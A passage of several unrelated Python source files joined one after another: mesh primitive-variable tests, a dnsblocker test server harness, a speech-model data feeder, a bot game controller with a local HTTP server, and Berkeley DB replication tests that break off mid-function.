self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# indices must be in range
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
# indices size matches interpolation, regardless of data size
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# except for constant which can have any number of indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
def testVariableIndexedView( self ) :
IECoreScene.testVariableIndexedView()
@unittest.skipIf( IECore.TestUtil.inMacCI(), "Mac CI is too slow for reliable timing" )
def testCancelLoading( self ) :
strip = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( 0 ), imath.V2f( 100000, 1 ) ), imath.V2i( 1000000, 1 ) )
testData = IECore.FloatVectorData( [0] * ( len( strip["P"].data ) ) )
for i in range( 10 ):
q = IECore.FloatVectorData( testData )
q[0] = i
strip["var%i" % i] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, q )
saveIO = IECore.MemoryIndexedIO( IECore.CharVectorData(), IECore.IndexedIO.OpenMode.Write )
strip.save( saveIO, "test" )
loadIO = IECore.MemoryIndexedIO( saveIO.buffer(), IECore.IndexedIO.OpenMode.Read )
canceller = IECore.Canceller()
cancelled = [False]
def backgroundRun():
try:
IECore.Object.load( loadIO, "test", canceller )
except IECore.Cancelled:
cancelled[0] = True
thread = threading.Thread(target=backgroundRun, args=())
startTime = time.time()
thread.start()
time.sleep( 0.05 )
canceller.cancel()
thread.join()
self.assertLess( time.time() - startTime, 0.1 )
self.assertTrue( cancelled[0] )
if __name__ == "__main__":
unittest.main()
|
server.py | import os
import signal
import random
import time
import errno
import getpass
import shutil
import threading
from subprocess import Popen, PIPE
from . management import Manager
class Server(Manager):
def __init__(self, **kwargs):
super().__init__()
self._server_process = None
self._dns_proxy_port = random.randint(64500, 64550)
self._address = kwargs.pop("address", "127.0.0.1")
self._service_port = kwargs.pop(
"service_port", random.randint(64555, 64580)
)
self._server_pid = None
self._pidfile = os.path.join(
self._virtual_env_root,
"tmp",
"dbl-test-%s.pid" % self._instance_id
)
self._server_params = kwargs.pop("params", {})
self._templates_dir = os.path.join(
self._project_root,
"service",
"etc",
"dnsblocker",
"templates"
)
self._dns_proxy_config_destdir = os.path.join(
self._virtual_env_root,
"var",
"run",
"dnsblocker-%s" % self._instance_id
)
self._stop_threads_flag = False
def tail_logfile(self):
with open(self._logfile, "r") as handle:
while not self._stop_threads_flag:
data = handle.read()
if data:
self._logger.info(data.rstrip())
def _setup_env(self):
#self._logger.info("Setting env")
os.makedirs(self._dns_proxy_config_destdir)
with open(self._logfile, "w+") as lh:
lh.write("# Test case log\n")
def _cleanup(self):
shutil.rmtree(self._dns_proxy_config_destdir)
try:
os.unlink(self._pidfile)
except OSError as e:
if e.errno != errno.ENOENT:
self._logger.error(e)
print(e)
def get_pid(self):
return self._server_pid
def get_pidfile_path(self):
return self._pidfile
def get_address(self):
return self._address
def get_port(self):
return self._service_port
def get_dns_port(self):
return self._dns_proxy_port
def __enter__(self):
self._setup_env()
if self._verbose:
self._tail_thread = threading.Thread(target=self.tail_logfile)
self._tail_thread.start()
executable = os.path.join(
self._project_root, "service", "bin", "dnsblocker")
cmd = [
executable,
"-D",
"-v",
#"-f",
#"--no-chdir",
#"--no-close-fds",
"--no-system-dns-proxy",
"--no-update",
"--pidfile", self._pidfile,
"--logfile", self._logfile,
"--logger-config-path", self._log_config_path,
"--network-ip4address", self.get_address(),
"--dns-proxy", "unbound",
"--dns-proxy-generate-config",
"--dns-proxy-port", str(self._dns_proxy_port),
"--dns-proxy-config-destdir", self._dns_proxy_config_destdir,
"--service-user", getpass.getuser(),
"--service-port", str(self._service_port),
"--db", self._db,
"--templates-dir", self._templates_dir,
]
for sparam in self._server_params:
option = sparam
if not option.startswith("--"):
option = "--" + sparam
cmd.extend([option, str(self._server_params[sparam])])
if self._verbose:
self._logger.debug(" ".join(cmd))
self._server_process = Popen(cmd, stdout=PIPE, shell=False)
wait = 25
#self._logger.debug("Waiting for pidfile")
while wait and not os.path.isfile(self._pidfile):
time.sleep(0.1)
wait -= 1
if not os.path.isfile(self._pidfile):
self._stop_threads_flag = True
raise Exception("Server startup failed")
wait = 10
try:
with open(self._pidfile, "r") as fh:
self._server_pid = int(fh.read())
while wait and (os.kill(self._server_pid, 0) is not None):
time.sleep(0.1)
wait -= 1
if os.kill(self._server_pid, 0) is not None:
raise Exception("Server startup failed")
except Exception as e:
self._logger.exception(e)
self._stop_threads_flag = True
#self._logger.debug("### Server: Server ready")
return self
def __exit__(self, tp, value, tb):
with open(self._pidfile, "r") as fh:
pid = int(fh.read())
wait = 500
try:
#self._logger.debug("### Stopping server %d" % pid)
os.kill(pid, signal.SIGTERM)
is_alive = True
while wait and is_alive:
try:
is_alive = (os.kill(pid, 0) is None)
if is_alive:
time.sleep(0.02)
wait -= 1
else:
break
except OSError as e:
if e.errno == errno.ESRCH:
break
if os.kill(pid, 0) is None:
self._logger.error("Killing with SIGKILL")
os.kill(pid, signal.SIGKILL)
self._logger.debug("### Server: Server stopped")
except OSError as e:
if e.errno != errno.ESRCH:
self._logger.exception(e)
raise
if self._verbose:
self._stop_threads_flag = True
self._tail_thread.join()
self._cleanup()
|
Feeder.py | import numpy as np
import json, os, time, pickle, librosa
from collections import deque
from threading import Thread
from random import shuffle
from Audio import melspectrogram
with open('Hyper_Parameters.json', 'r') as f:
hp_Dict = json.load(f)
class Feeder:
def __init__(self, is_Training= False):
self.is_Training = is_Training
self.Metadata_Load()
if self.is_Training:
self.pattern_Queue = deque()
pattern_Generate_Thread = Thread(target=self.Train_Pattern_Generate)
pattern_Generate_Thread.daemon = True
pattern_Generate_Thread.start()
def Metadata_Load(self):
with open(hp_Dict['Token_JSON_Path'], 'r') as f:
self.token_Index_Dict = json.load(f)
if self.is_Training:
with open(os.path.join(hp_Dict['Train']['Pattern_Path'], hp_Dict['Train']['Metadata_File']).replace('\\', '/'), 'rb') as f:
self.metadata_Dict = pickle.load(f)
if not all([
self.token_Index_Dict[key] == self.metadata_Dict['Token_Index_Dict'][key]
for key in self.token_Index_Dict.keys()
]):
raise ValueError('The token information of metadata information and hyper parameter is not consistent.')
elif not all([
self.metadata_Dict['Spectrogram_Dim'] == hp_Dict['Sound']['Spectrogram_Dim'],
self.metadata_Dict['Mel_Dim'] == hp_Dict['Sound']['Mel_Dim'],
self.metadata_Dict['Frame_Shift'] == hp_Dict['Sound']['Frame_Shift'],
self.metadata_Dict['Frame_Length'] == hp_Dict['Sound']['Frame_Length'],
self.metadata_Dict['Sample_Rate'] == hp_Dict['Sound']['Sample_Rate'],
self.metadata_Dict['Max_Abs_Mel'] == hp_Dict['Sound']['Max_Abs_Mel'],
]):
raise ValueError('The metadata information and hyper parameter setting are not consistent.')
def Train_Pattern_Generate(self):
min_Mel_Length = hp_Dict['Train']['Min_Wav_Length'] / hp_Dict['Sound']['Frame_Shift']
max_Mel_Length = hp_Dict['Train']['Max_Wav_Length'] / hp_Dict['Sound']['Frame_Shift']
path_List = [
(path, self.metadata_Dict['Mel_Length_Dict'][path])
for path in self.metadata_Dict['File_List']
if self.metadata_Dict['Mel_Length_Dict'][path] >= min_Mel_Length and self.metadata_Dict['Mel_Length_Dict'][path] <= max_Mel_Length
]
print(
'Train pattern info', '\n',
'Total pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict'])), '\n',
'Use pattern count: {}'.format(len(path_List)), '\n',
'Excluded pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict']) - len(path_List))
)
if hp_Dict['Train']['Pattern_Sorting']:
path_List = [file_Name for file_Name, _ in sorted(path_List, key=lambda x: x[1])]
else:
path_List = [file_Name for file_Name, _ in path_List]
while True:
if not hp_Dict['Train']['Pattern_Sorting']:
shuffle(path_List)
path_Batch_List = [
path_List[x:x + hp_Dict['Train']['Batch_Size']]
for x in range(0, len(path_List), hp_Dict['Train']['Batch_Size'])
]
shuffle(path_Batch_List)
#path_Batch_List = path_Batch_List[0:2] + list(reversed(path_Batch_List)) #Batch size의 적절성을 위한 코드. 10회 이상 되면 문제 없음
batch_Index = 0
while batch_Index < len(path_Batch_List):
if len(self.pattern_Queue) >= hp_Dict['Train']['Max_Pattern_Queue']:
time.sleep(0.1)
continue
pattern_Count = len(path_Batch_List[batch_Index])
mel_List = []
token_List = []
for file_Path in path_Batch_List[batch_Index]:
with open(os.path.join(hp_Dict['Train']['Pattern_Path'], file_Path).replace('\\', '/'), 'rb') as f:
pattern_Dict = pickle.load(f)
mel_List.append(pattern_Dict['Mel'])
token_List.append(pattern_Dict['Token'])
max_Mel_Length = max([mel.shape[0] for mel in mel_List])
max_Token_Length = max([token.shape[0] for token in token_List]) + 2
new_Mel_Pattern = np.zeros(
shape=(pattern_Count, max_Mel_Length, hp_Dict['Sound']['Mel_Dim']),
dtype= np.float32
)
new_Token_Pattern = np.zeros(
shape=(pattern_Count, max_Token_Length),
dtype= np.int32
) + self.token_Index_Dict['<E>']
new_Token_Pattern[:, 0] = self.token_Index_Dict['<S>']
for pattern_Index, (mel, token) in enumerate(zip(mel_List, token_List)):
new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel
new_Token_Pattern[pattern_Index, 1:token.shape[0] + 1] = token
self.pattern_Queue.append({
'mels': new_Mel_Pattern,
'mel_lengths': np.array([mel.shape[0] for mel in mel_List], dtype=np.int32),
'tokens': new_Token_Pattern,
'token_lengths': np.array([token.shape[0] + 1 for token in token_List], dtype=np.int32) #Only one of <S> or <E> is used.
})
batch_Index += 1
def Get_Train_Pattern(self):
while len(self.pattern_Queue) == 0: #When training speed is faster than making pattern, model should be wait.
time.sleep(0.01)
return self.pattern_Queue.popleft()
def Get_Inference_Pattern(self, wav_Path_List):
pattern_Count = len(wav_Path_List)
mel_List = [
np.transpose(melspectrogram(
y= librosa.effects.trim(librosa.core.load(path, sr= hp_Dict['Sound']['Sample_Rate'])[0], top_db=15)[0] * 0.99,
num_freq= hp_Dict['Sound']['Spectrogram_Dim'],
frame_shift_ms= hp_Dict['Sound']['Frame_Shift'],
frame_length_ms= hp_Dict['Sound']['Frame_Length'],
num_mels= hp_Dict['Sound']['Mel_Dim'],
sample_rate= hp_Dict['Sound']['Sample_Rate'],
max_abs_value= hp_Dict['Sound']['Max_Abs_Mel']
)).astype(np.float32)
for path in wav_Path_List
]
max_Mel_Length = max([mel.shape[0] for mel in mel_List])
new_Mel_Pattern = np.zeros(
shape=(pattern_Count, max_Mel_Length, hp_Dict['Sound']['Mel_Dim']),
dtype= np.float32
)
for pattern_Index, mel in enumerate(mel_List):
new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel
new_Token_Pattern = np.zeros(
shape=(pattern_Count, 1),
dtype= np.int32
) + self.token_Index_Dict['<S>']
return {
'mels': new_Mel_Pattern,
'mel_lengths': np.array([mel.shape[0] for mel in mel_List], dtype=np.int32),
'initial_tokens': new_Token_Pattern
}
if __name__ == '__main__':
new_Feeder = Feeder(is_Training= True)
while True:
print(len(new_Feeder.pattern_Queue))
time.sleep(1.0) |
gamecontroller.py | import os
import time
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
import threading
import uuid
import json
from multiprocessing import Queue, Event, Process
from .playercontroller import SandboxedPlayerController
from .exceptions import GameFinishedException, GameLogicException, TimeoutException
def get_cookie():
return uuid.uuid4().hex[0:8]
class GameControllerHTTPRequestHandler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
return
def do_POST(self):
content_len = int(self.headers.getheader('content-length'))
post_body = self.rfile.read(content_len)
# Parse content
data = json.loads(post_body)
bot_cookie = data["BOT_COOKIE"]
# Handle the bot controller request
ret = self.server.game_controller.handle_player_request(data, bot_cookie)
if ret == 0:
self.send_response(200)
else:
self.send_response(501)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(ret))
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
class BaseGameController:
def __init__(self):
self._server = None
self._server_thread = None
self.server_host = "localhost"
self.server_port = 0
self.rounds = 100
self.current_round = 0
self.players = {}
self.finish_game_event = Event()
self._exception = None
self._bot_in_turn = None
self.turns_queue = Queue()
self.std_out_queue = Queue()
self.stop_event = Event()
def log_msg(self, msg):
self.std_out_queue.put(msg)
def handle_player_request(self, data, bot_cookie):
if self.players[bot_cookie]["turn_event"].is_set() and self._bot_in_turn == bot_cookie:
try:
ret = self.evaluate_turn(data, bot_cookie)
return ret
except Exception, e:
# Error in game logic
self.log_msg("GAME LOGIC ERROR: " + str(e))
self.stop()
self._exception = (GameLogicException, str(e))
finally:
self.players[bot_cookie]["turn_event"].clear()
self._bot_in_turn = None
else:
# Wrong turn!
self.log_msg("WRONG TURN FROM BOT %s" % bot_cookie)
return -1
def evaluate_turn(self, player, request):
raise NotImplementedError
def _start_http_server(self):
self._server = ThreadedHTTPServer((self.server_host, 0), GameControllerHTTPRequestHandler)
self.server_port = self._server.server_port
self._server.game_controller = self
self.log_msg("Starting http server server..")
self._server_thread = threading.Thread(target=self._server.serve_forever)
# Exit the server thread when the main thread terminates
self._server_thread.daemon = True
self._server_thread.start()
self.log_msg("Server loop running in thread: %s PORT: %s" % (self._server_thread.name, self.server_port))
def add_player(self, player_id, player_script):
bot_cookie = get_cookie()
turn_event = Event()
connected_event = Event()
main_queue = Queue()
self.players[bot_cookie] = {"player_id": player_id,
"bot_cookie": bot_cookie,
"player_script": player_script,
"turn_event": turn_event,
"connected_event": connected_event,
"main_queue": main_queue}
def run_player_process(self, player_d, p_k):
p = SandboxedPlayerController(player_d["player_id"], os.path.abspath(player_d["player_script"]),
player_d["bot_cookie"], player_d["turn_event"],
player_d["connected_event"], player_d["main_queue"],
self.std_out_queue, self.server_port)
p.run_process()
def run_stdout_thread(self):
def _print_queue():
while True:
while not self.std_out_queue.empty():
print(self.std_out_queue.get())
if self.stop_event.is_set():
break
time.sleep(0.05)
stdout_thread = threading.Thread(target=_print_queue)
# Exit the server thread when the main thread terminates
stdout_thread.daemon = True
stdout_thread.start()
def get_turn_data(self, bot_cookie):
return None
def stop(self):
self.finish_game_event.set()
def raise_if_stopped(self):
if self.finish_game_event.is_set():
raise GameFinishedException
def _start_rounds(self):
self.log_msg("Starting rounds")
try:
for i in range(0, self.rounds):
self.current_round = i
self.raise_if_stopped()
self.log_msg("\n\nStarting round %s\n" % str(i))
for p_k in self.players.keys():
self.raise_if_stopped()
turn_cookie = get_cookie()
self.log_msg("\n===== STARTED TURN %s FOR BOT %s" % (turn_cookie, self.players[p_k]["bot_cookie"]))
self._bot_in_turn = p_k
self.players[p_k]["turn_event"].set()
try:
turn_data = {"MSG": "TURN",
"DATA": self.get_turn_data(p_k),
"TURN_COOKIE": turn_cookie}
self.players[p_k]["main_queue"].put(json.dumps(turn_data))
except Exception, e:
raise GameLogicException("Turn data error %s" % str(e))
# Wait for the player to finish the turn...
max_wait = 2
while self.players[p_k]["turn_event"].is_set():
if max_wait < 1:
self.players[p_k]["main_queue"].put(json.dumps({"MSG": "KILL"}))
raise GameFinishedException("Player %s turn timeout." % self.players[p_k]['player_id'])
else:
sleep_time = 0.02
max_wait -= sleep_time
# turn based timeout check could go here
time.sleep(sleep_time)
self._bot_in_turn = None
self.log_msg("===== ENDED TURN %s FOR BOT %s" % (turn_cookie, self.players[p_k]["bot_cookie"]))
except GameFinishedException, e:
self.log_msg("FINISHED GAME")
except GameLogicException, e:
self.log_msg("GAME ERROR")
self._exception = (GameLogicException, str(e))
def run(self):
self._start_http_server()
self.run_stdout_thread()
startup_okay = True
# Start all the sandbox processes
for p_k in self.players.keys():
self.log_msg("Starting player..")
p = Process(target=self.run_player_process, args=(self.players[p_k], p_k))
p.start()
# Wait for the sandbox process to connect to the controller.
max_wait = 3
connected = True
while not self.players[p_k]["connected_event"].is_set():
if max_wait < 1 or not p.is_alive():
connected = False
break
sleep_time = 0.05
max_wait -= sleep_time
time.sleep(sleep_time)
if connected:
self.log_msg("Player %s connected" % self.players[p_k]["bot_cookie"])
else:
# player couldn't connect
startup_okay = False
err_msg = "Player %s didn't connect in time." % self.players[p_k]['player_id']
self.log_msg(err_msg)
self.players[p_k]["main_queue"].put(json.dumps({"MSG": "KILL"}))
self._exception = (TimeoutException, err_msg)
break
if startup_okay:
self._start_rounds()
else:
self.stop()
for p_k in self.players.keys():
self.players[p_k]["main_queue"].put(json.dumps({"MSG": "QUIT"}))
self.log_msg("\nCLOSING..")
# Exit
self.log_msg("Shutting down http server...")
time.sleep(2)
self._server.shutdown()
self.stop_event.set()
if self._exception:
raise self._exception[0](self._exception[1])
|
test_replication.py | """TestCases for distributed transactions.
"""
import os
import time
import unittest
from .test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0o666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0o666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
client_port = test_support.find_unused_port()
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
d = self.dbenvMaster.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], client_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], master_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0o666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0o666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
def setUp(self) :
DBReplicationManager.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import queue
self.m2c = queue.Queue()
self.c2m = queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0o666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0o666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("master_changes" in d)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
